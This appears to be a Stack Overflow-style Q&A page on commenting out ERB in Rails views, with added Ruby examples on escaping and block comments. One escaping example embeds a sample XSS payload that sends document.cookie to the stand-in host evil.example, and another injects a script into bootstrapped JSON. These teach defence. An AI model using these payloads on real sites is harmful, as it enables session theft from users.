Why does commented-out ERB still throw errors? - ruby-on-rails

I have an HTML file in this format:
html
more html
<%= valid erb %>
<!--
<%= incomplete_erb_with_bugs %>
-->
But I still get an exception page, because of the buggy ERB. But shouldn't commenting that section out cause that part not to be read by the browser? Is there another HTML method for actually preventing the browser from reading code?

Because it's not commented.
But shouldn't commenting that section out cause that part not to be read by the browser?
The browser does not execute Ruby or ERB - the server does before it sends the resulting HTML document to the browser.
ERB is Ruby code embedded in a file that contains literal text. The interpreter does not care about anything except the code in "erb tags".
This is just literal text
<%# this is a ruby line comment - the code below is executed: %>
<% bar do %>
<%= foo %>
<% end %>
The rest is just placed in the buffer. This is just like PHP or any other embedded language.
So an HTML comment (or CSS or JS for that matter) does not affect the ERB interpreter in any way. The interpreter does not really know or care that it's creating HTML.
Is there another HTML method for actually preventing the browser from reading code?
The browser does not execute Ruby code. It just builds a document from whatever you send in the response.
So use a ruby comment <%#= incomplete_erb_with_bugs %> which will prevent the code from being executed - and it will never get sent to the browser.
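To make the server-side point concrete, here is an added stdlib-only Ruby example (not code from the question or this answer) that compiles both templates with ERB and looks at the Ruby that ERB generates from them. The two templates and the valid_value local are constructed for the example; incomplete_erb_with_bugs is left undefined on purpose so that the broken tag raises when it is executed.

```ruby
require "erb"

# Constructed template: the broken ERB tag sits inside an HTML comment.
HTML_COMMENTED = <<~TEMPLATE
  <p>valid: <%= valid_value %></p>
  <!--
  <%= incomplete_erb_with_bugs %>
  -->
TEMPLATE

# Constructed template: the same tag turned into an ERB comment with <%#.
RUBY_COMMENTED = <<~TEMPLATE
  <p>valid: <%= valid_value %></p>
  <%#= incomplete_erb_with_bugs %>
TEMPLATE

# The Ruby source ERB compiles a template into. The "<!--" and "-->" markers
# are just characters inside a string literal here; the tag between them is
# live code that runs on the server before any HTML exists.
def generated_source(template)
  ERB.new(template).src
end

# Render on the server side. Returns [:ok, html] or [:error, missing_name].
# A browser only ever sees the result: either the HTML or the exception page.
def render(template, valid_value:)
  [:ok, ERB.new(template).result(binding)]
rescue NameError => e
  [:error, e.name]
end

if __FILE__ == $PROGRAM_NAME
  puts generated_source(HTML_COMMENTED)
  p render(HTML_COMMENTED, valid_value: "ok")  # the HTML comment does not help
  p render(RUBY_COMMENTED, valid_value: "ok")  # the ERB comment does
end
```

The generated source for the first template still contains incomplete_erb_with_bugs, which is why the exception page appears; for the second it is gone entirely, so nothing about it reaches the browser.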

You're commenting out HTML, but the Ruby code inside it still gets evaluated. You need to comment out the code, which is done like this:
<%#= incomplete_erb_with_bugs %>

You need to comment the actual line, not the HTML surrounding it:
html
more html
<%= valid erb %>
<%= incomplete_erb_with_bugs %>
You can also use if statements:
<% if false %>
<%#= incomplete_erb_with_bugs %>
<% end %>

Related

What is the difference between <%== %> and <%= %> in rails? [duplicate]

I saw this recently, thought it was interesting. But I don't really understand what it does?
Ex. I have a rails app and I want to bootstrap some json, so that I don't have to make a second request. Normally I would write something like this.
<%= raw @model.to_json %>
or
<%= @model.to_json.html_safe %>
I have to send the message raw or html_safe or the json will be html escaped and thus not parsed correctly. However, this seems to work too.
<%== @model.to_json %>
But I can't find any documentation.
Does anyone know what this does exactly? i.e. Is it the exact same as calling html_safe or raw? Or is there more to it?
<%== is equivalent to raw.
From the Ruby on Rails Guide:
To insert something verbatim use the raw helper rather than calling html_safe:
<%= raw @cms.current_template %> <%# inserts @cms.current_template as is %>
or, equivalently, use <%==:
<%== @cms.current_template %> <%# inserts @cms.current_template as is %>
Rails actually uses Erubis instead of ERB, which supports a variety of other stuff.
<%== is exactly as you expect, though: It emits the value unescaped

Rails Template Inline Code not running

I have a ruby on rails html.erb file with inline code in it like below. However, the code doesn't always run when somebody loads the page. It only prints to stdout the first time the page is loaded.
<%puts "TESTING"%>
Does rails cache my html.erb pages somehow? Is there a way to turn it off?
If you want to output something you need to use <%= %> instead of <% %>
<%= "TESTING" %>
<%= %> - Evaluate and print the output
<% %> - only evaluate
Try below code:
<%= "TESTING" %>
<%= %> is used to print the text in html.erb file

RHTML displaying HTML tags on output

I have an RHTML view in Rails, where the output is coming from my MongoDB collection. The data is outputted correctly using an iteration block, but whenever I try and have HTML tags in my database, they are not rendered in the HTML output, instead they are just displayed.
<%
@posts.find().each do |post|
%>
<h1><%=post["name"]%></h1>
<p><%=post["body"] %></p>
<p><%=post["timestamp"]%></p>
<%
end
%>
But, for instance, if I had
<p>Test</p>
In my database, the tags would be rendered, instead of being printed.
This is a security precaution that is now built into Rails 3. It prevents XSS (cross-site scripting) issues.
If you add raw you'll get the output you want.
<% @posts.each do |post| %>
<h1><%=raw post["name"]%></h1>
<p><%=raw post["body"] %></p>
<p><%=raw post["timestamp"]%></p>
<% end %>
However, if you are storing user-created arbitrary HTML, I don't recommend you do this unless you are sanitizing the input prior to storing it in the database.
Edit:
Another option: Using the sanitize helper in place of raw, e.g. <%=sanitize post["name"], :tags => %w(p) %> to allow only <p> tags.
Apart from raw and .html_safe, which give 100% trust to the user's input, you could also use sanitize to restrict only a number of tags that allowed.
<%= sanitize post["name"] %>
For the details, see: http://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html
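The <%== / raw discussion in the first Related question and the escaping and sanitize discussion just above make the same point from two sides: <%= %> escapes, raw / html_safe / <%== do not. The following added example (not code from any of the answers, and stdlib only, so Rails' automatic escaping is imitated by calling ERB::Util.html_escape explicitly) renders a constructed post record both ways, then bootstraps a constructed model into a <script> element to show why raw JSON is not enough either and what the fix looks like. The POST and MODEL records and the json_escape helper are assumptions of the example; json_escape mirrors what ActiveSupport's json_escape does but is not Rails' code.

```ruby
require "erb"
require "json"

# Constructed record: what a stored post looks like after an attacker submits
# HTML through a form that does not sanitise on the way in.
POST = {
  "name" => "Hello <b>world</b>",
  "body" => "<p>Test</p><script>new Image().src='https://evil.example/?c='+document.cookie</script>",
}.freeze

# What Rails' <%= %> does for you: escape. Plain stdlib ERB never escapes, so
# ERB::Util.html_escape is called explicitly to reproduce the same behaviour.
def escaped_view(post)
  template = "<h1><%= ERB::Util.html_escape(post['name']) %></h1>\n<p><%= ERB::Util.html_escape(post['body']) %></p>\n"
  ERB.new(template).result(binding)
end

# What raw / html_safe / <%== does: emit the stored value verbatim.
def raw_view(post)
  template = "<h1><%= post['name'] %></h1>\n<p><%= post['body'] %></p>\n"
  ERB.new(template).result(binding)
end

# Assumed helper, not Rails' own code. JSON.generate leaves < > & untouched, so
# a string containing "</script>" closes the element early when the JSON is
# printed raw. Rewriting those characters (and the JS line terminators
# U+2028/U+2029) as \uXXXX escapes keeps the output valid JSON that decodes to
# the same value, which is what ActiveSupport's json_escape does.
def json_escape(value)
  JSON.generate(value).gsub(/[<>&\u2028\u2029]/) { |c| format("\\u%04x", c.ord) }
end

# Constructed model with a hostile title, bootstrapped into the page as in the
# question about <%== @model.to_json %>.
MODEL = { "title" => "Plans</script><script>alert(document.cookie)</script>" }.freeze

# html_escape is the wrong tool here (a script block is not HTML-decoded), so
# the choice is between raw JSON and JSON with the dangerous characters escaped.
def bootstrap_script(model, safe:)
  json = safe ? json_escape(model) : JSON.generate(model)
  ERB.new("<script>window.model = <%= json %>;</script>\n").result(binding)
end

if __FILE__ == $PROGRAM_NAME
  puts escaped_view(POST)
  puts raw_view(POST)
  puts bootstrap_script(MODEL, safe: false)
  puts bootstrap_script(MODEL, safe: true)
end
```

The raw view hands the stored script straight to the browser; the escaped view shows it as text. In the bootstrap case, the unsafe output contains a second <script> element supplied by the data, while the escaped output has exactly one closing </script> and still parses back to the original model.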

Block comments in html.erb templates in rails

How do you comment out html mixed with ruby code?
some text <% ... %> more text <%= ... %>
something else
<% ... %>
In JSP it's really simple: <%-- ... --%>, but I'm unable to find any concise option in Rails.
Simple html comments <!-- ... --> do not work: ruby code is still executed and yells errors.
There's an option to use if false with HTML comments, but it's quite verbose, not to mention IDEs don't support it.
There's also an option coming from pure ruby, which surprisingly works.
<%
=begin %>
... html and ruby code goes here
<%
=end %>
It's generally fine, except that it's verbose, weird-looking and none of ruby IDEs I know support it (yep, I like to comment/comment-out with one keystroke).
I'm curious, is there any 'official' way of doing this in Rails?
Thanks!
Use this for commenting single lines:
<%# your_ruby_code %>
For multiple lines, the following would work:
<%
=begin %>
<% ruby_code %>
<%
=end %>
What you said would work.
I wouldn't count as a solution, but perhaps enclosing the chunk between an
<% if false %>
...
<% end %>
or if you feel a little dirty, create a helper that simply outputs nothing.
I've never needed it, but I'm stumped that there seems to be no out-of-the-box solution for this.
The =begin approach is annoying because:
It doesn't work for mixed HTML and Ruby (or just HTML) that's on a single line
It's annoying to type
The <% if false %> approach works, but it looks weird and doesn't give anyone else who looks at your code a hint about your intentions.
My solution is as follows:
In application_helper.rb, add a method like so:
def comment
end
Then in your view template, you can say:
<% comment do %>Some stuff that won't be rendered...<% end %>
This works because any Ruby method can take a block, but will silently ignore the passed-in block if your method doesn't include a yield.
<%#=
...commented
multiline
block...
%>
For block comments in templates, my text editor (Komodo) finds this variation on @Garfield's recommendation least obnoxious:
<%# A long multiline comment in a rails template ...
# line 2
# and so on ...
# %>
To comment out erb tags use the ruby comment hash symbol before the = sign in the opening tag
<p>
This is some text I want to keep
<%= @some_object.some_attribute %>
</p>
<p>
I want to keep this text but comment out the erb tag
<%#= @some_object.another_attribute %>
</p>
<!--
<p>
I want all of this text commented out including the erb tag
<%#= @some_object.some_attribute %>
</p>
-->
<!--
<p>
I just want this html commented out but I want to keep the erb tag
<%= @some_object.some_attribute %>
</p>
-->
Since you can use <% %> to put in a Ruby block, it can certainly be used to put comments in it.
A simpler and more elegant solution would look like...
<%
# See! I am a Ruby Comment
# And I am multi-line
# I look like a recognizable ruby comment block too
# and not so complex
# The only drawback with me is the Hash symbol you have to repeat
# But it's the norm, isn't it?
%>
After =begin you do not need to put %>
<%
=begin
code code code code code code
code code code code code code
code code code code code code
code code code code code code
=end %>
Just an addendum to some of the previous answers. I found the =begin/=end solution most useful, but for the sake of beauty I write it like so:
<%
=begin
<p>HTML will be ignored</p>
<%= 'and so will ruby' %>
<p>
<%= 'plus the whole block will be greyed in editor' %>
</p>
=end
%>
Note that since everything is ignored until the =end there is no need to close the =begin tag with %> or open the =end tag with <% (which has also been pointed out in an earlier answer)
I found this to be the most elegant solution to completely comment out a block of mixed Ruby and HTML code and have it greyed out in my editor as well, as opposed to the <% if false %> solution. The only drawback is that =begin and =end must be placed at the very beginning of the line.
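Added example, not code from any of the answers in this thread: a stdlib-only ERB check of which block-comment forms from the answers above actually stop the Ruby inside from running. It covers the `<% =begin %>` form, `=begin` at the start of a line, `<% if false %>`, the `comment` helper from the application_helper.rb answer, and a multi-line `<%# %>`. `boom` is a deliberately undefined name, so a section that still executes raises NameError instead of rendering; `try_render` and the templates are constructed for the example. It also exposes one caveat none of the answers mention: a `<%#` comment ends at the first `%>`, so it cannot wrap other ERB tags.

```ruby
require "erb"

# The application_helper.rb method suggested above: takes a block and never
# yields, so the block body is compiled but never executed.
def comment
end

# Constructed templates. `boom` is deliberately undefined: if the "commented"
# part still executes, rendering raises NameError instead of returning HTML.
BROKEN_BEGIN = <<~TEMPLATE
  <p>shown</p>
  <% =begin %>
  <p>hidden</p><%= boom %>
  <% =end %>
TEMPLATE

LINE_START_BEGIN = <<~TEMPLATE
  <p>shown</p>
  <%
  =begin %>
  <p>hidden</p><%= boom %>
  <%
  =end %>
TEMPLATE

IF_FALSE = <<~TEMPLATE
  <p>shown</p>
  <% if false %>
  <p>hidden</p><%= boom %>
  <% end %>
TEMPLATE

COMMENT_HELPER = <<~TEMPLATE
  <p>shown</p>
  <% comment do %>
  <p>hidden</p><%= boom %>
  <% end %>
TEMPLATE

# A multi-line ERB comment wrapped around an ERB tag: the comment ends at the
# first %>, which belongs to <%= boom %>, so boom never runs but the remaining
# "%>" line leaks into the output as literal text.
HASH_COMMENT = <<~TEMPLATE
  <p>shown</p>
  <%#
  <p>hidden</p><%= boom %>
  %>
TEMPLATE

# Returns [:ok, html], [:syntax_error, message] or [:name_error, name].
# `<% =begin %>` fails at compile time because Ruby only recognises =begin at
# column 0 of a line, and ERB joins tag contents onto the previous statement.
def try_render(template)
  [:ok, ERB.new(template).result(binding)]
rescue SyntaxError => e
  [:syntax_error, e.message]
rescue NameError => e
  [:name_error, e.name]
end

if __FILE__ == $PROGRAM_NAME
  { broken_begin: BROKEN_BEGIN, line_start_begin: LINE_START_BEGIN,
    if_false: IF_FALSE, comment_helper: COMMENT_HELPER,
    hash_comment: HASH_COMMENT }.each do |name, t|
    status, detail = try_render(t)
    puts "#{name}: #{status} #{detail.inspect}"
  end
end
```

Three forms (=begin at line start, if false, the comment helper) render only the "shown" paragraph; the inline `<% =begin %>` form is a SyntaxError; the `<%#` form hides the text but leaves a stray `%>` in the page, which is why it is only suitable for comments that contain no ERB tags.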
Use a HEREDOC called comment
Pros:
Self-explanatory that this is a comment
Works for erb and HTML tags
Has ok syntax highlighting (as one long string)
Cons:
Weird 3 line closing syntax
No keyboard shortcuts
Code:
The opening tag can be
<% <<-COMMENT %>
the above closing erb tag is just for looks (to match the end),
but don't put anything else there, it may show up on the page
or
<%
<<-COMMENT
%>
Anything here won't run or show up in the browser
<P>
this will not be displayed in the browser
<strong> even in the developer's tools </strong>
</p>
<% 1_000_000_000_000.times do |count| %>
for the <%= count %>'th time, this won't run a trillion times,
this is all just a string
all of these %>, <%, <% end %>, end, do, <!--, won't cause any issues.
but the below opening erb tag is important (if you used any erb tags in the comment).
I have no clue why?
The closing tag
yes it needs to be 3 lines 😟.
I don't know why the opening erb tag is important but it is! (unless you didn't use any erb tags in the comment).
<%
COMMENT
%>
You have to bear in mind where the code is executed. Ruby-style comments work because the Ruby code is executed on the server before it is served to the web browser. This also explains why HTML comments do not work—the Ruby has already been executed.
Doesn't the IDE you're using support creating custom macros for commenting out blocks of code?
You can use both <%if false%> and HTML comments at the same time:
<%if false%><!--
stuff to comment out
--><%end%>
The benefits are:
Ruby code is not executed
The commented block has gray color in IDE
The intention is obvious for other developers
Sublime Text's block comment shortcut ctrl+shift+/ notices whether you've selected normal HTML or an ERB tag and puts either the <!-- or <%
=begin %> accordingly.
This is the only one that worked for me.
<%
=begin %>
code code code code code code
code code code code code code
code code code code code code
code code code code code code
=end %>
<% %w(
<span title="<%= title %>">hello</span>
) %>
I hope I've just blown your minds!
One way
This is my preferred way.
<%# START COMMENTED OUT SECTION %>
<%if false%><!--
your view code here....
--><%end%>
<%# END COMMENTED OUT SECTION %>
You might say, why on earth would you want massive caps locks sentences in your code? The answer is because it's easy to forget (or simply not know) what <%if false%><-- is doing, or what --><%end%> is doing. A sleepy or uncaffeinated developer could easily delete them thinking they were typos, which would not be good! That's why I try to be kind to myself/other developers and make it super obvious. It's not succinct or pretty, but it's very practical and almost foolproof.
Second way
This method is great for being:
Simple
Not idiosyncratic (i.e. uses normally formatted ruby)
Expressive: conveys the meaning of what's happening (someone can easily figure out what it's doing)
Minimal
And here it is:
<%#
multiple
lines
commented
out
%>
The only acceptable solution I ever found to this back-breaking problem was to put a space within the "<%=" to make it no longer register as ruby code, and then comment out the whole block with html comments
Like this:
<!--
<p>
< %= @some_object.some_attribute %>
</p>
<p>
< %= @some_object.another_attribute %>
</p>
<p>
< %= @some_object.some_attribute %>
</p>
<p>
< %= @some_object.some_attribute %>
</p>
-->
Yes, adding the spaces is annoying. But it is the least annoying of all the solutions I've yet seen.